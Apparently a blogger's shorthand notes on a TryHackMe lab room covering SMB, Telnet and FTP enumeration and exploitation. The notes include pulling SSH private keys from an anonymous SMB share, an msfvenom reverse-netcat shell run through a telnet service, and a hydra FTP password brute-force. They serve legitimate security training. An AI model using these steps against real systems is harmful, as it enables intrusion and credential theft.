TryHackMe Network Services Room Notes

Are you going through TryHackMe’s Network Services 1 Room? Need help taking notes? I got you covered. Here are my Network Services 1 room notes from TryHackMe, use them as much as you need!

Disclaimer, this is written in shorthand format, meaning, full sentences and proper grammar are not always used. For writeups, see SMB Part 1, for help with Linux, see Quick Start Guide.

SMB: Understanding, Enumerating, Exploiting

Server Message Block (SMB) Protocol: client/server comms for file/printer/serial ports/others for MS Windows.

• Type: response-request protocol, transmits multiple messages to est connection.
• Connections: TCP/IP (NetBIOS, NetBEUI, IPX/SPX).
• SMB Commands (SMBs): if est connection, share files etc.
• Support: Samba (open source server) by UNIX.

Enumeration: process of gathering info, enum4linux.

• Install (ubuntu): enum4linux
  1. git clone <github URL>
  2. mv enum4linux.pl /usr/bin
  3. apt install smbclient
• Access: smbclient
  1. smbclient -U Anonymous //<ip>/profiles
  2. ls, more "Working...txt"
  3. cd .ssh, ls, mget id_rsa*
  4. chmod 600 id_rsa cactus@<ip>

Telnet: Understanding, Enumerating, Exploiting

Telnet: app protocol, connects/executes commands, non-secure clear text, replaced by ssh e.g. telnet <ip> <port>.

• Enumeration: dosen’t ‘jump out’ at us.
  1. sudo nmap -vv -T4 -p- <ip>
  2. nmap -vv -A -p 8012 <ip>
  3. s****** b******
• CVE (Common Vuln and Exposures): listed public sec flaws, with IDs.
• Shell: code/program to gain code/command execution.
• Reverse Shell: target comms back to attack device, target has listening port.
  1. telnet <ip> <port> | CTRL + ] closes telnet.
  2. sudo tcpdump ip proto \\\\icmp -i tun0
  3. .RUN ping <my ip> -c 1
  4. msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
  5. nc -lvp 4444
  6. .RUN <payload>

FTP: Understanding, Enumerating, Exploiting

File Transfer Protocol, allows remote (client/server) files transfers.

• Two Channels: 1) command/control, transmits commands/replies, 2) data, transfers actual data.
• Modes:
  • Active: client opens/listens, server actively connects.
  • Passive: server opens/listens, client connects.
• Enumeration
  1. nmap -vv -T4 -Pn -p- <ip> & nmap -vv -A -p 21 <ip>
  2. ftp <ip>, anonymous, ls, more PUBLIC_NOTICE.txt
• Exploit: command/data channels unencrypted
  1. hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt.gz -vV <ip> ftp

This is Day 42 of #100DaysOfHacking, subscribe to my newsletter to see the CyberSec journey! If you like, follow the Learning Path for yourself, happy hacking.